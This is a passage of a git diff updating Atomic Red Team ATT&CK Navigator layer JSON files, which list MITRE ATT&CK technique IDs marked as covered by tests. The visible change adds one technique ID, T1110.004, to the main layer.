,{"techniqueID":"T1057","score":100,"enabled":true},{"techniqueID":"T1059.002","score":100,"enabled":true},{"techniqueID":"T1059","score":100,"enabled":true},{"techniqueID":"T1059.004","score":100,"enabled":true},{"techniqueID":"T1069.001","score":100,"enabled":true},{"techniqueID":"T1069","score":100,"enabled":true},{"techniqueID":"T1070.002","score":100,"enabled":true},{"techniqueID":"T1070","score":100,"enabled":true},{"techniqueID":"T1070.003","score":100,"enabled":true},{"techniqueID":"T1070.004","score":100,"enabled":true},{"techniqueID":"T1070.006","score":100,"enabled":true},{"techniqueID":"T1071.001","score":100,"enabled":true},{"techniqueID":"T1071","score":100,"enabled":true},{"techniqueID":"T1074.001","score":100,"enabled":true},{"techniqueID":"T1074","score":100,"enabled":true},{"techniqueID":"T1082","score":100,"enabled":true},{"techniqueID":"T1083","score":100,"enabled":true},{"techniqueID":"T1087.001","score":100,"enabled":true},{"techniqueID":"T1087","score":100,"enabled":true},{"techniqueID":"T1090.001","score":100,"enabled":true},{"techniqueID":"T1090","score":100,"enabled":true},{"techniqueID":"T1098.004","score":100,"enabled":true},{"techniqueID":"T1098","score":100,"enabled":true},{"techniqueID":"T1105","score":100,"enabled":true},{"techniqueID":"T1110.004","score":100,"enabled":true},{"techniqueID":"T1110","score":100,"enabled":true},{"techniqueID":"T1113","score":100,"enabled":true},{"techniqueID":"T1115","score":100,"enabled":true},{"techniqueID":"T1132.001","score":100,"enabled":true},{"techniqueID":"T1132","score":100,"enabled":true},{"techniqueID":"T1135","score":100,"enabled":true},{"techniqueID":"T1136.001","score":100,"enabled":true},{"techniqueID":"T1136","score":100,"enabled":true},{"techniqueID":"T1176","score":100,"enabled":true},{"techniqueID":"T1201","score":100,"enabled":true},{"techniqueID":"T1217","score":100,"enabled":true},{"techniqueID":"T1222.002","score":100,"enabled":true},{"techniqueID":"T1222","score":100,"enabled":true},{"techniqueID":"T1485","score":100,"enabled":true},{"techniqueID":"T1496","score":100,"enabled":true},{"techniqueID":"T1497.001","score":100,"enabled":true},{"techniqueID":"T1497","score":100,"enabled":true},{"techniqueID":"T1518.001","score":100,"enabled":true},{"techniqueID":"T1518","score":100,"enabled":true},{"techniqueID":"T1518","score":100,"enabled":true},{"techniqueID":"T1529","score":100,"enabled":true},{"techniqueID":"T1543.001","score":100,"enabled":true},{"techniqueID":"T1543","score":100,"enabled":true},{"techniqueID":"T1543.004","score":100,"enabled":true},{"techniqueID":"T1546.004","score":100,"enabled":true},{"techniqueID":"T1546","score":100,"enabled":true},{"techniqueID":"T1546.005","score":100,"enabled":true},{"techniqueID":"T1546.014","score":100,"enabled":true},{"techniqueID":"T1547.007","score":100,"enabled":true},{"techniqueID":"T1547","score":100,"enabled":true},{"techniqueID":"T1547.011","score":100,"enabled":true},{"techniqueID":"T1548.001","score":100,"enabled":true},{"techniqueID":"T1548","score":100,"enabled":true},{"techniqueID":"T1548.003","score":100,"enabled":true},{"techniqueID":"T1552.001","score":100,"enabled":true},{"techniqueID":"T1552","score":100,"enabled":true},{"techniqueID":"T1552.003","score":100,"enabled":true},{"techniqueID":"T1552.004","score":100,"enabled":true},{"techniqueID":"T1552.007","score":100,"enabled":true},{"techniqueID":"T1553.001","score":100,"enabled":true},{"techniqueID":"T1553","score":100,"enabled":true},{"techniqueID":"T1553.004","score":100,"enabled":true},{"techniqueID":"T1555.001","score":100,"enabled":true},{"techniqueID":"T1555","score":100,"enabled":true},{"techniqueID":"T1555.003","score":100,"enabled":true},{"techniqueID":"T1560.001","score":100,"enabled":true},{"techniqueID":"T1560","score":100,"enabled":true},{"techniqueID":"T1562.001","score":100,"enabled":true},{"techniqueID":"T1562","score":100,"enabled":true},{"techniqueID":"T1562.003","score":100,"enabled":true},{"techniqueID":"T1564.001","score":100,"enabled":true},{"techniqueID":"T1564","score":100,"enabled":true},{"techniqueID":"T1564.002","score":100,"enabled":true},{"techniqueID":"T1569.001","score":100,"enabled":true},{"techniqueID":"T1569","score":100,"enabled":true},{"techniqueID":"T1571","score":100,"enabled":true},{"techniqueID":"T1609","score":100,"enabled":true}]} \ No newline at end of file diff --git a/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer.json b/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer.json index 21e118de..cf3aef14 100644 --- a/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer.json +++ b/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer.json @@ -1 +1 @@ -{"version":"4.1","name":"Atomic Red Team","description":"Atomic Red Team MITRE ATT&CK Navigator Layer","domain":"mitre-enterprise","gradient":{"colors":["#ce232e","#ce232e"],"minValue":0,"maxValue":100},"legendItems":[{"label":"Has at least one test","color":"#ce232e"}],"techniques":[{"techniqueID":"T1003.001","score":100,"enabled":true},{"techniqueID":"T1003","score":100,"enabled":true},{"techniqueID":"T1003.002","score":100,"enabled":true},{"techniqueID":"T1003.003","score":100,"enabled":true},{"techniqueID":"T1003.004","score":100,"enabled":true},{"techniqueID":"T1003.006","score":100,"enabled":true},{"techniqueID":"T1003.007","score":100,"enabled":true},{"techniqueID":"T1003.008","score":100,"enabled":true},{"techniqueID":"T1003","score":100,"enabled":true},{"techniqueID":"T1006","score":100,"enabled":true},{"techniqueID":"T1007","score":100,"enabled":true},{"techniqueID":"T1010","score":100,"enabled":true},{"techniqueID":"T1012","score":100,"enabled":true},{"techniqueID":"T1014","score":100,"enabled":true},{"techniqueID":"T1016","score":100,"enabled":true},{"techniqueID":"T1018","score":100,"enabled":true},{"techniqueID":"T1020","score":100,"enabled":true},{"techniqueID":"T1021.001","score":100,"enabled":true},{"techniqueID":"T1021","score":100,"enabled":true},{"techniqueID":"T1021.002","score":100,"enabled":true},{"techniqueID":"T1021.003","score":100,"enabled":true},{"techniqueID":"T1021.006","score":100,"enabled":true},{"techniqueID":"T1027.001","score":100,"enabled":true},{"techniqueID":"T1027","score":100,"enabled":true},{"techniqueID":"T1027.002","score":100,"enabled":true},{"techniqueID":"T1027.004","score":100,"enabled":true},{"techniqueID":"T1027","score":100,"enabled":true},{"techniqueID":"T1030","score":100,"enabled":true},{"techniqueID":"T1033","score":100,"enabled":true},{"techniqueID":"T1036.003","score":100,"enabled":true},{"techniqueID":"T1036","score":100,"enabled":true},{"techniqueID":"T1036.004","score":100,"enabled":true},{"techniqueID":"T1036.006","score":100,"enabled":true},{"techniqueID":"T1036","score":100,"enabled":true},{"techniqueID":"T1037.001","score":100,"enabled":true},{"techniqueID":"T1037","score":100,"enabled":true},{"techniqueID":"T1037.002","score":100,"enabled":true},{"techniqueID":"T1037.004","score":100,"enabled":true},{"techniqueID":"T1037.005","score":100,"enabled":true},{"techniqueID":"T1040","score":100,"enabled":true},{"techniqueID":"T1046","score":100,"enabled":true},{"techniqueID":"T1047","score":100,"enabled":true},{"techniqueID":"T1048.003","score":100,"enabled":true},{"techniqueID":"T1048","score":100,"enabled":true},{"techniqueID":"T1048","score":100,"enabled":true},{"techniqueID":"T1049","score":100,"enabled":true},{"techniqueID":"T1053.001","score":100,"enabled":true},{"techniqueID":"T1053","score":100,"enabled":true},{"techniqueID":"T1053.002","score":100,"enabled":true},{"techniqueID":"T1053.003","score":100,"enabled":true},{"techniqueID":"T1053.004","score":100,"enabled":true},{"techniqueID":"T1053.005","score":100,"enabled":true},{"techniqueID":"T1053.006","score":100,"enabled":true},{"techniqueID":"T1053.007","score":100,"enabled":true},{"techniqueID":"T1055.001","score":100,"enabled":true},{"techniqueID":"T1055","score":100,"enabled":true},{"techniqueID":"T1055.004","score":100,"enabled":true},{"techniqueID":"T1055.012","score":100,"enabled":true},{"techniqueID":"T1055","score":100,"enabled":true},{"techniqueID":"T1056.001","score":100,"enabled":true},{"techniqueID":"T1056","score":100,"enabled":true},{"techniqueID":"T1056.002","score":100,"enabled":true},{"techniqueID":"T1056.004","score":100,"enabled":true},{"techniqueID":"T1057","score":100,"enabled":true},{"techniqueID":"T1059.001","score":100,"enabled":true},{"techniqueID":"T1059","score":100,"enabled":true},{"techniqueID":"T1059.002","score":100,"enabled":true},{"techniqueID":"T1059.003","score":100,"enabled":true},{"techniqueID":"T1059.004","score":100,"enabled":true},{"techniqueID":"T1059.005","score":100,"enabled":true},{"techniqueID":"T1059.006","score":100,"enabled":true},{"techniqueID":"T1069.001","score":100,"enabled":true},{"techniqueID":"T1069","score":100,"enabled":true},{"techniqueID":"T1069.002","score":100,"enabled":true},{"techniqueID":"T1070.001","score":100,"enabled":true},{"techniqueID":"T1070","score":100,"enabled":true},{"techniqueID":"T1070.002","score":100,"enabled":true},{"techniqueID":"T1070.003","score":100,"enabled":true},{"techniqueID":"T1070.004","score":100,"enabled":true},{"techniqueID":"T1070.005","score":100,"enabled":true},{"techniqueID":"T1070.006","score":100,"enabled":true},{"techniqueID":"T1070","score":100,"enabled":true},{"techniqueID":"T1071.001","score":100,"enabled":true},{"techniqueID":"T1071","score":100,"enabled":true},{"techniqueID":"T1071.004","score":100,"enabled":true},{"techniqueID":"T1074.001","score":100,"enabled":true},{"techniqueID":"T1074","score":100,"enabled":true},{"techniqueID":"T1078.001","score":100,"enabled":true},{"techniqueID":"T1078","score":100,"enabled":true},{"techniqueID":"T1078.003","score":100,"enabled":true},{"techniqueID":"T1082","score":100,"enabled":true},{"techniqueID":"T1083","score":100,"enabled":true},{"techniqueID":"T1087.001","score":100,"enabled":true},{"techniqueID":"T1087","score":100,"enabled":true},{"techniqueID":"T1087.002","score":100,"enabled":true},{"techniqueID":"T1090.001","score":100,"enabled":true},{"techniqueID":"T1090","score":100,"enabled":true},{"techniqueID":"T1095","score":100,"enabled":true},{"techniqueID":"T1098.004","score":100,"enabled":true},{"techniqueID":"T1098","score":100,"enabled":true},{"techniqueID":"T1098","score":100,"enabled":true},{"techniqueID":"T1105","score":100,"enabled":true},{"techniqueID":"T1106","score":100,"enabled":true},{"techniqueID":"T1110.001","score":100,"enabled":true},{"techniqueID":"T1110","score":100,"enabled":true},{"techniqueID":"T1110.002","score":100,"enabled":true},{"techniqueID":"T1110.003","score":100,"enabled":true},{"techniqueID":"T1112","score":100,"enabled":true},{"techniqueID":"T1113","score":100,"enabled":true},{"techniqueID":"T1114.001","score":100,"enabled":true},{"techniqueID":"T1114","score":100,"enabled":true},{"techniqueID":"T1115","score":100,"enabled":true},{"techniqueID":"T1119","score":100,"enabled":true},{"techniqueID":"T1120","score":100,"enabled":true},{"techniqueID":"T1123","score":100,"enabled":true},{"techniqueID":"T1124","score":100,"enabled":true},{"techniqueID":"T1127.001","score":100,"enabled":true},{"techniqueID":"T1127","score":100,"enabled":true},{"techniqueID":"T1132.001","score":100,"enabled":true},{"techniqueID":"T1132","score":100,"enabled":true},{"techniqueID":"T1133","score":100,"enabled":true},{"techniqueID":"T1134.001","score":100,"enabled":true},{"techniqueID":"T1134","score":100,"enabled":true},{"techniqueID":"T1134.004","score":100,"enabled":true},{"techniqueID":"T1135","score":100,"enabled":true},{"techniqueID":"T1136.001","score":100,"enabled":true},{"techniqueID":"T1136","score":100,"enabled":true},{"techniqueID":"T1136.002","score":100,"enabled":true},{"techniqueID":"T1137.002","score":100,"enabled":true},{"techniqueID":"T1137","score":100,"enabled":true},{"techniqueID":"T1137.004","score":100,"enabled":true},{"techniqueID":"T1137","score":100,"enabled":true},{"techniqueID":"T1140","score":100,"enabled":true},{"techniqueID":"T1176","score":100,"enabled":true},{"techniqueID":"T1197","score":100,"enabled":true},{"techniqueID":"T1201","score":100,"enabled":true},{"techniqueID":"T1202","score":100,"enabled":true},{"techniqueID":"T1204.002","score":100,"enabled":true},{"techniqueID":"T1204","score":100,"enabled":true},{"techniqueID":"T1207","score":100,"enabled":true},{"techniqueID":"T1216.001","score":100,"enabled":true},{"techniqueID":"T1216","score":100,"enabled":true},{"techniqueID":"T1216","score":100,"enabled":true},{"techniqueID":"T1217","score":100,"enabled":true},{"techniqueID":"T1218.001","score":100,"enabled":true},{"techniqueID":"T1218","score":100,"enabled":true},{"techniqueID":"T1218.002","score":100,"enabled":true},{"techniqueID":"T1218.003","score":100,"enabled":true},{"techniqueID":"T1218.004","score":100,"enabled":true},{"techniqueID":"T1218.005","score":100,"enabled":true},{"techniqueID":"T1218.007","score":100,"enabled":true},{"techniqueID":"T1218.008","score":100,"enabled":true},{"techniqueID":"T1218.009","score":100,"enabled":true},{"techniqueID":"T1218.010","score":100,"enabled":true},{"techniqueID":"T1218.011","score":100,"enabled":true},{"techniqueID":"T1218","score":100,"enabled":true},{"techniqueID":"T1219","score":100,"enabled":true},{"techniqueID":"T1220","score":100,"enabled":true},{"techniqueID":"T1221","score":100,"enabled":true},{"techniqueID":"T1222.001","score":100,"enabled":true},{"techniqueID":"T1222","score":100,"enabled":true},{"techniqueID":"T1222.002","score":100,"enabled":true},{"techniqueID":"T1482","score":100,"enabled":true},{"techniqueID":"T1485","score":100,"enabled":true},{"techniqueID":"T1486","score":100,"enabled":true},{"techniqueID":"T1489","score":100,"enabled":true},{"techniqueID":"T1490","score":100,"enabled":true},{"techniqueID":"T1491.001","score":100,"enabled":true},{"techniqueID":"T1491","score":100,"enabled":true},{"techniqueID":"T1496","score":100,"enabled":true},{"techniqueID":"T1497.001","score":100,"enabled":true},{"techniqueID":"T1497","score":100,"enabled":true},{"techniqueID":"T1505.002","score":100,"enabled":true},{"techniqueID":"T1505","score":100,"enabled":true},{"techniqueID":"T1505.003","score":100,"enabled":true},{"techniqueID":"T1518.001","score":100,"enabled":true},{"techniqueID":"T1518","score":100,"enabled":true},{"techniqueID":"T1518","score":100,"enabled":true},{"techniqueID":"T1529","score":100,"enabled":true},{"techniqueID":"T1531","score":100,"enabled":true},{"techniqueID":"T1543.001","score":100,"enabled":true},{"techniqueID":"T1543","score":100,"enabled":true},{"techniqueID":"T1543.002","score":100,"enabled":true},{"techniqueID":"T1543.003","score":100,"enabled":true},{"techniqueID":"T1543.004","score":100,"enabled":true},{"techniqueID":"T1546.001","score":100,"enabled":true},{"techniqueID":"T1546","score":100,"enabled":true},{"techniqueID":"T1546.002","score":100,"enabled":true},{"techniqueID":"T1546.003","score":100,"enabled":true},{"techniqueID":"T1546.004","score":100,"enabled":true},{"techniqueID":"T1546.005","score":100,"enabled":true},{"techniqueID":"T1546.007","score":100,"enabled":true},{"techniqueID":"T1546.008","score":100,"enabled":true},{"techniqueID":"T1546.010","score":100,"enabled":true},{"techniqueID":"T1546.011","score":100,"enabled":true},{"techniqueID":"T1546.012","score":100,"enabled":true},{"techniqueID":"T1546.013","score":100,"enabled":true},{"techniqueID":"T1546.014","score":100,"enabled":true},{"techniqueID":"T1547.001","score":100,"enabled":true},{"techniqueID":"T1547","score":100,"enabled":true},{"techniqueID":"T1547.004","score":100,"enabled":true},{"techniqueID":"T1547.005","score":100,"enabled":true},{"techniqueID":"T1547.006","score":100,"enabled":true},{"techniqueID":"T1547.007","score":100,"enabled":true},{"techniqueID":"T1547.009","score":100,"enabled":true},{"techniqueID":"T1547.010","score":100,"enabled":true},{"techniqueID":"T1547.011","score":100,"enabled":true},{"techniqueID":"T1548.001","score":100,"enabled":true},{"techniqueID":"T1548","score":100,"enabled":true},{"techniqueID":"T1548.002","score":100,"enabled":true},{"techniqueID":"T1548.003","score":100,"enabled":true},{"techniqueID":"T1550.002","score":100,"enabled":true},{"techniqueID":"T1550","score":100,"enabled":true},{"techniqueID":"T1550.003","score":100,"enabled":true},{"techniqueID":"T1552.001","score":100,"enabled":true},{"techniqueID":"T1552","score":100,"enabled":true},{"techniqueID":"T1552.002","score":100,"enabled":true},{"techniqueID":"T1552.003","score":100,"enabled":true},{"techniqueID":"T1552.004","score":100,"enabled":true},{"techniqueID":"T1552.006","score":100,"enabled":true},{"techniqueID":"T1552.007","score":100,"enabled":true},{"techniqueID":"T1553.001","score":100,"enabled":true},{"techniqueID":"T1553","score":100,"enabled":true},{"techniqueID":"T1553.004","score":100,"enabled":true},{"techniqueID":"T1553.005","score":100,"enabled":true},{"techniqueID":"T1555.001","score":100,"enabled":true},{"techniqueID":"T1555","score":100,"enabled":true},{"techniqueID":"T1555.003","score":100,"enabled":true},{"techniqueID":"T1555","score":100,"enabled":true},{"techniqueID":"T1556.002","score":100,"enabled":true},{"techniqueID":"T1556","score":100,"enabled":true},{"techniqueID":"T1558.001","score":100,"enabled":true},{"techniqueID":"T1558","score":100,"enabled":true},{"techniqueID":"T1558.003","score":100,"enabled":true},{"techniqueID":"T1559.002","score":100,"enabled":true},{"techniqueID":"T1559","score":100,"enabled":true},{"techniqueID":"T1560.001","score":100,"enabled":true},{"techniqueID":"T1560","score":100,"enabled":true},{"techniqueID":"T1560.002","score":100,"enabled":true},{"techniqueID":"T1560","score":100,"enabled":true},{"techniqueID":"T1562.001","score":100,"enabled":true},{"techniqueID":"T1562","score":100,"enabled":true},{"techniqueID":"T1562.002","score":100,"enabled":true},{"techniqueID":"T1562.003","score":100,"enabled":true},{"techniqueID":"T1562.004","score":100,"enabled":true},{"techniqueID":"T1562.006","score":100,"enabled":true},{"techniqueID":"T1563.002","score":100,"enabled":true},{"techniqueID":"T1563","score":100,"enabled":true},{"techniqueID":"T1564.001","score":100,"enabled":true},{"techniqueID":"T1564","score":100,"enabled":true},{"techniqueID":"T1564.002","score":100,"enabled":true},{"techniqueID":"T1564.003","score":100,"enabled":true},{"techniqueID":"T1564.004","score":100,"enabled":true},{"techniqueID":"T1564","score":100,"enabled":true},{"techniqueID":"T1566.001","score":100,"enabled":true},{"techniqueID":"T1566","score":100,"enabled":true},{"techniqueID":"T1569.001","score":100,"enabled":true},{"techniqueID":"T1569","score":100,"enabled":true},{"techniqueID":"T1569.002","score":100,"enabled":true},{"techniqueID":"T1571","score":100,"enabled":true},{"techniqueID":"T1573","score":100,"enabled":true},{"techniqueID":"T1574.001","score":100,"enabled":true},{"techniqueID":"T1574","score":100,"enabled":true},{"techniqueID":"T1574.002","score":100,"enabled":true},{"techniqueID":"T1574.006","score":100,"enabled":true},{"techniqueID":"T1574.009","score":100,"enabled":true},{"techniqueID":"T1574.011","score":100,"enabled":true},{"techniqueID":"T1574.012","score":100,"enabled":true},{"techniqueID":"T1609","score":100,"enabled":true},{"techniqueID":"T1610","score":100,"enabled":true},{"techniqueID":"T1611","score":100,"enabled":true}]} \ No newline at end of file +{"version":"4.1","name":"Atomic Red Team","description":"Atomic Red Team MITRE ATT&CK Navigator Layer","domain":"mitre-enterprise","gradient":{"colors":["#ce232e","#ce232e"],"minValue":0,"maxValue":100},"legendItems":[{"label":"Has at least one test","color":"#ce232e"}],"techniques":[{"techniqueID":"T1003.001","score":100,"enabled":true},{"techniqueID":"T1003","score":100,"enabled":true},{"techniqueID":"T1003.002","score":100,"enabled":true},{"techniqueID":"T1003.003","score":100,"enabled":true},{"techniqueID":"T1003.004","score":100,"enabled":true},{"techniqueID":"T1003.006","score":100,"enabled":true},{"techniqueID":"T1003.007","score":100,"enabled":true},{"techniqueID":"T1003.008","score":100,"enabled":true},{"techniqueID":"T1003","score":100,"enabled":true},{"techniqueID":"T1006","score":100,"enabled":true},{"techniqueID":"T1007","score":100,"enabled":true},{"techniqueID":"T1010","score":100,"enabled":true},{"techniqueID":"T1012","score":100,"enabled":true},{"techniqueID":"T1014","score":100,"enabled":true},{"techniqueID":"T1016","score":100,"enabled":true},{"techniqueID":"T1018","score":100,"enabled":true},{"techniqueID":"T1020","score":100,"enabled":true},{"techniqueID":"T1021.001","score":100,"enabled":true},{"techniqueID":"T1021","score":100,"enabled":true},{"techniqueID":"T1021.002","score":100,"enabled":true},{"techniqueID":"T1021.003","score":100,"enabled":true},{"techniqueID":"T1021.006","score":100,"enabled":true},{"techniqueID":"T1027.001","score":100,"enabled":true},{"techniqueID":"T1027","score":100,"enabled":true},{"techniqueID":"T1027.002","score":100,"enabled":true},{"techniqueID":"T1027.004","score":100,"enabled":true},{"techniqueID":"T1027","score":100,"enabled":true},{"techniqueID":"T1030","score":100,"enabled":true},{"techniqueID":"T1033","score":100,"enabled":true},{"techniqueID":"T1036.003","score":100,"enabled":true},{"techniqueID":"T1036","score":100,"enabled":true},{"techniqueID":"T1036.004","score":100,"enabled":true},{"techniqueID":"T1036.006","score":100,"enabled":true},{"techniqueID":"T1036","score":100,"enabled":true},{"techniqueID":"T1037.001","score":100,"enabled":true},{"techniqueID":"T1037","score":100,"enabled":true},{"techniqueID":"T1037.002","score":100,"enabled":true},{"techniqueID":"T1037.004","score":100,"enabled":true},{"techniqueID":"T1037.005","score":100,"enabled":true},{"techniqueID":"T1040","score":100,"enabled":true},{"techniqueID":"T1046","score":100,"enabled":true},{"techniqueID":"T1047","score":100,"enabled":true},{"techniqueID":"T1048.003","score":100,"enabled":true},{"techniqueID":"T1048","score":100,"enabled":true},{"techniqueID":"T1048","score":100,"enabled":true},{"techniqueID":"T1049","score":100,"enabled":true},{"techniqueID":"T1053.001","score":100,"enabled":true},{"techniqueID":"T1053","score":100,"enabled":true},{"techniqueID":"T1053.002","score":100,"enabled":true},{"techniqueID":"T1053.003","score":100,"enabled":true},{"techniqueID":"T1053.004","score":100,"enabled":true},{"techniqueID":"T1053.005","score":100,"enabled":true},{"techniqueID":"T1053.006","score":100,"enabled":true},{"techniqueID":"T1053.007","score":100,"enabled":true},{"techniqueID":"T1055.001","score":100,"enabled":true},{"techniqueID":"T1055","score":100,"enabled":true},{"techniqueID":"T1055.004","score":100,"enabled":true},{"techniqueID":"T1055.012","score":100,"enabled":true},{"techniqueID":"T1055","score":100,"enabled":true},{"techniqueID":"T1056.001","score":100,"enabled":true},{"techniqueID":"T1056","score":100,"enabled":true},{"techniqueID":"T1056.002","score":100,"enabled":true},{"techniqueID":"T1056.004","score":100,"enabled":true},{"techniqueID":"T1057","score":100,"enabled":true},{"techniqueID":"T1059.001","score":100,"enabled":true},{"techniqueID":"T1059","score":100,"enabled":true},{"techniqueID":"T1059.002","score":100,"enabled":true},{"techniqueID":"T1059.003","score":100,"enabled":true},{"techniqueID":"T1059.004","score":100,"enabled":true},{"techniqueID":"T1059.005","score":100,"enabled":true},{"techniqueID":"T1059.006","score":100,"enabled":true},{"techniqueID":"T1069.001","score":100,"enabled":true},{"techniqueID":"T1069","score":100,"enabled":true},{"techniqueID":"T1069.002","score":100,"enabled":true},{"techniqueID":"T1070.001","score":100,"enabled":true},{"techniqueID":"T1070","score":100,"enabled":true},{"techniqueID":"T1070.002","score":100,"enabled":true},{"techniqueID":"T1070.003","score":100,"enabled":true},{"techniqueID":"T1070.004","score":100,"enabled":true},{"techniqueID":"T1070.005","score":100,"enabled":true},{"techniqueID":"T1070.006","score":100,"enabled":true},{"techniqueID":"T1070","score":100,"enabled":true},{"techniqueID":"T1071.001","score":100,"enabled":true},{"techniqueID":"T1071","score":100,"enabled":true},{"techniqueID":"T1071.004","score":100,"enabled":true},{"techniqueID":"T1074.001","score":100,"enabled":true},{"techniqueID":"T1074","score":100,"enabled":true},{"techniqueID":"T1078.001","score":100,"enabled":true},{"techniqueID":"T1078","score":100,"enabled":true},{"techniqueID":"T1078.003","score":100,"enabled":true},{"techniqueID":"T1082","score":100,"enabled":true},{"techniqueID":"T1083","score":100,"enabled":true},{"techniqueID":"T1087.001","score":100,"enabled":true},{"techniqueID":"T1087","score":100,"enabled":true},{"techniqueID":"T1087.002","score":100,"enabled":true},{"techniqueID":"T1090.001","score":100,"enabled":true},{"techniqueID":"T1090","score":100,"enabled":true},{"techniqueID":"T1095","score":100,"enabled":true},{"techniqueID":"T1098.004","score":100,"enabled":true},{"techniqueID":"T1098","score":100,"enabled":true},{"techniqueID":"T1098","score":100,"enabled":true},{"techniqueID":"T1105","score":100,"enabled":true},{"techniqueID":"T1106","score":100,"enabled":true},{"techniqueID":"T1110.001","score":100,"enabled":true},{"techniqueID":"T1110","score":100,"enabled":true},{"techniqueID":"T1110.002","score":100,"enabled":true},{"techniqueID":"T1110.003","score":100,"enabled":true},{"techniqueID":"T1110.004","score":100,"enabled":true},{"techniqueID":"T1112","score":100,"enabled":true},{"techniqueID":"T1113","score":100,"enabled":true},{"techniqueID":"T1114.001","score":100,"enabled":true},{"techniqueID":"T1114","score":100,"enabled":true},{"techniqueID":"T1115","score":100,"enabled":true},{"techniqueID":"T1119","score":100,"enabled":true},{"techniqueID":"T1120","score":100,"enabled":true},{"techniqueID":"T1123","score":100,"enabled":true},{"techniqueID":"T1124","score":100,"enabled":true},{"techniqueID":"T1127.001","score":100,"enabled":true},{"techniqueID":"T1127","score":100,"enabled":true},{"techniqueID":"T1132.001","score":100,"enabled":true},{"techniqueID":"T1132","score":100,"enabled":true},{"techniqueID":"T1133","score":100,"enabled":true},{"techniqueID":"T1134.001","score":100,"enabled":true},{"techniqueID":"T1134","score":100,"enabled":true},{"techniqueID":"T1134.004","score":100,"enabled":true},{"techniqueID":"T1135","score":100,"enabled":true},{"techniqueID":"T1136.001","score":100,"enabled":true},{"techniqueID":"T1136","score":100,"enabled":true},{"techniqueID":"T1136.002","score":100,"enabled":true},{"techniqueID":"T1137.002","score":100,"enabled":true},{"techniqueID":"T1137","score":100,"enabled":true},{"techniqueID":"T1137.004","score":100,"enabled":true},{"techniqueID":"T1137","score":100,"enabled":true},{"techniqueID":"T1140","score":100,"enabled":true},{"techniqueID":"T1176","score":100,"enabled":true},{"techniqueID":"T1197","score":100,"enabled":true},{"techniqueID":"T1201","score":100,"enabled":true},{"techniqueID":"T1202","score":100,"enabled":true},{"techniqueID":"T1204.002","score":100,"enabled":true},{"techniqueID":"T1204","score":100,"enabled":true},{"techniqueID":"T1207","score":100,"enabled":true},{"techniqueID":"T1216.001","score":100,"enabled":true},{"techniqueID":"T1216","score":100,"enabled":true},{"techniqueID":"T1216","score":100,"enabled":true},{"techniqueID":"T1217","score":100,"enabled":true},{"techniqueID":"T1218.001","score":100,"enabled":true},{"techniqueID":"T1218","score":100,"enabled":true},{"techniqueID":"T1218.002","score":100,"enabled":true},{"techniqueID":"T1218.003","score":100,"enabled":true},{"techniqueID":"T1218.004","score":100,"enabled":true},{"techniqueID":"T1218.005","score":100,"enabled":true},{"techniqueID":"T1218.007","score":100,"enabled":true},{"techniqueID":"T1218.008","score":100,"enabled":true},{"techniqueID":"T1218.009","score":100,"enabled":true},{"techniqueID":"T1218.010","score":100,"enabled":true},{"techniqueID":"T1218.011","score":100,"enabled":true},{"techniqueID":"T1218","score":100,"enabled":true},{"techniqueID":"T1219","score":100,"enabled":true},{"techniqueID":"T1220","score":100,"enabled":true},{"techniqueID":"T1221","score":100,"enabled":true},{"techniqueID":"T1222.001","score":100,"enabled":true},{"techniqueID":"T1222","score":100,"enabled":true},{"techniqueID":"T1222.002","score":100,"enabled":true},{"techniqueID":"T1482","score":100,"enabled":true},{"techniqueID":"T1485","score":100,"enabled":true},{"techniqueID":"T1486","score":100,"enabled":true},{"techniqueID":"T1489","score":100,"enabled":true},{"techniqueID":"T1490","score":100,"enabled":true},{"techniqueID":"T1491.001","score":100,"enabled":true},{"techniqueID":"T1491","score":100,"enabled":true},{"techniqueID":"T1496","score":100,"enabled":true},{"techniqueID":"T1497.001","score":100,"enabled":true},{"techniqueID":"T1497","score":100,"enabled":true},{"techniqueID":"T1505.002","score":100,"enabled":true},{"techniqueID":"T1505","score":100,"enabled":true},{"techniqueID":"T1505.003","score":100,"enabled":true},{"techniqueID":"T1518.001","score":100,"enabled":true},{"techniqueID":"T1518","score":100,"enabled":true},{"techniqueID":"T1518","score":100,"enabled":true},{"techniqueID":"T1529","score":100,"enabled":true},{"techniqueID":"T1531","score":100,"enabled":true},{"techniqueID":"T1543.001","score":100,"enabled":true},{"techniqueID":"T1543","score":100,"enabled":true},{"techniqueID":"T1543.002","score":100,"enabled":true},{"techniqueID":"T1543.003","score":100,"enabled":true},{"techniqueID":"T1543.004","score":100,"enabled":true},{"techniqueID":"T1546.001","score":100,"enabled":true},{"techniqueID":"T1546","score":100,"enabled":true},{"techniqueID":"T1546.002","score":100,"enabled":true},{"techniqueID":"T1546.003","score":100,"enabled":true},{"techniqueID":"T1546.004","score":100,"enabled":true},{"techniqueID":"T1546.005","score":100,"enabled":true},{"techniqueID":"T1546.007","score":100,"enabled":true},{"techniqueID":"T1546.008","score":100,"enabled":true},{"techniqueID":"T1546.010","score":100,"enabled":true},{"techniqueID":"T1546.011","score":100,"enabled":true},{"techniqueID":"T1546.012","score":100,"enabled":true},{"techniqueID":"T1546.013","score":100,"enabled":true},{"techniqueID":"T1546.014","score":100,"enabled":true},{"techniqueID":"T1547.001","score":100,"enabled":true},{"techniqueID":"T1547","score":100,"enabled":true},{"techniqueID":"T1547.004","score":100,"enabled":true},{"techniqueID":"T1547.005","score":100,"enabled":true},{"techniqueID":"T1547.006","score":100,"enabled":true},{"techniqueID":"T1547.007","score":100,"enabled":true},{"techniqueID":"T1547.009","score":100,"enabled":true},{"techniqueID":"T1547.010","score":100,"enabled":true},{"techniqueID":"T1547.011","score":100,"enabled":true},{"techniqueID":"T1548.001","score":100,"enabled":true},{"techniqueID":"T1548","score":100,"enabled":true},{"techniqueID":"T1548.002","score":100,"enabled":true},{"techniqueID":"T1548.003","score":100,"enabled":true},{"techniqueID":"T1550.002","score":100,"enabled":true},{"techniqueID":"T1550","score":100,"enabled":true},{"techniqueID":"T1550.003","score":100,"enabled":true},{"techniqueID":"T1552.001","score":100,"enabled":true},{"techniqueID":"T1552","score":100,"enabled":true},{"techniqueID":"T1552.002","score":100,"enabled":true},{"techniqueID":"T1552.003","score":100,"enabled":true},{"techniqueID":"T1552.004","score":100,"enabled":true},{"techniqueID":"T1552.006","score":100,"enabled":true},{"techniqueID":"T1552.007","score":100,"enabled":true},{"techniqueID":"T1553.001","score":100,"enabled":true},{"techniqueID":"T1553","score":100,"enabled":true},{"techniqueID":"T1553.004","score":100,"enabled":true},{"techniqueID":"T15